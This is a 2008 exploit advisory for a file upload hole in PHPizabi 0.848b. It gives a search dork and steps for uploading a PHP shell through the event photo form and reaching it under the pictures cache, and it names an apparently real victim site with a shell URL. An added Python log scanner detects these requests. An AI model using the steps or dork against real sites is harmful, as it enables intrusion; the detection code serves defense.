# Title : PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability
# Published : 2008-02-17
# Author : ZoRLu
############################################
Powered by PHPizabi v0.848b C1 HFP1 remote file upload
author: ZoRLu
home: www.yildirimordulari.org
contact: trt-turk@hotmail.com
dork: "Powered by PHPizabi v0.848b C1 HFP1"
############################################
exploit:
http://localhost/izabi/system/cache/pictures/id_shell.php
- First, register on the web site.
- Click "Create an event" and create an event (direct create-event URL: http://localhost/izabi/?L=events.create).
- Enter the event title and description. Under "show to", select "All the users". Click the gözat (Browse) button and upload shell.php.
- Then go to the event page. Right-click the uploaded photo, click Properties in the menu, and copy the URL.
example:
http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
and
exploit:
http://localhost/izabi/system/cache/pictures/xxx_shell.php
example web site:
http://bitchinindie.com/system/image.php?file=597_shell.php&width=500
exploit shell.php
http://bitchinindie.com/system/cache/pictures/597_shell.php
##################################################
thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasırga(lavrens), avkidis, head_hunter
and all yildirimordulari.org users
siircicocuk, where have you been, buddy? Get on MSN, you've made us miss you :)))
## Whether yildirimordulari.org will open or not, nobody knows, but one thing is known: it is a legend ##
#################################################
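For defenders triaging a PHPizabi install, the two request shapes the advisory describes (a script name passed to image.php, and a direct request for a script under system/cache/pictures/) can be searched for in web access logs. The following is an added example, not part of the original advisory or of PHPizabi; the combined log format, the extension list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Extensions a PHP-enabled server may pass to the interpreter (assumed list; match your handler config).
# The trailing group also catches double extensions (x.php.jpg) and path-info (x.php/foo).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|/|$)", re.IGNORECASE)
UPLOAD_DIR = "/system/cache/pictures/"   # upload cache path named in the advisory
THUMB_SCRIPT = "/system/image.php"       # thumbnail script named in the advisory
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(target):
    """Return a reason if the request target references a script in the upload cache, else None."""
    parts = urlsplit(target)
    path = unquote(parts.path)            # decode %2E and similar before matching
    if UPLOAD_DIR in path and SCRIPT_EXT.search(path.split(UPLOAD_DIR, 1)[1]):
        return "direct request for script in upload cache"
    if path.endswith(THUMB_SCRIPT):
        for value in parse_qs(parts.query).get("file", []):
            if SCRIPT_EXT.search(value):
                return "image.php asked to render a script file"
    return None

def scan(lines):
    """Yield-free scan: list of (client_ip, target, status, reason) for suspicious lines."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue                      # skip lines that are not in combined log format
        reason = classify(m.group("target"))
        if reason:
            findings.append((m.group("ip"), m.group("target"), int(m.group("status")), reason))
    return findings

# Constructed sample log lines (documentation IP ranges, paths taken from the advisory's localhost URLs).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Feb/2008:10:00:00 +0000] "GET /izabi/system/image.php?file=123_photo.jpg&width=500 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [17/Feb/2008:10:01:00 +0000] "GET /izabi/system/image.php?file=xxx_shell.php&width=500 HTTP/1.1" 200 0',
    '198.51.100.7 - - [17/Feb/2008:10:01:30 +0000] "GET /izabi/system/cache/pictures/xxx_shell.php HTTP/1.1" 200 512',
    '192.0.2.10 - - [17/Feb/2008:10:02:00 +0000] "GET /izabi/system/cache/pictures/123_photo.jpg HTTP/1.1" 200 4096',
    '198.51.100.7 - - [17/Feb/2008:10:03:00 +0000] "GET /izabi/system/cache/pictures/77_a%2EpHp HTTP/1.1" 404 0',
    '192.0.2.10 - - [17/Feb/2008:10:04:00 +0000] "POST /izabi/?L=events.create HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a direct request means the server answered for that file, so the upload cache should then be checked on disk for non-image files and script execution disabled for that directory.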
# www.Syue.com [2008-02-17]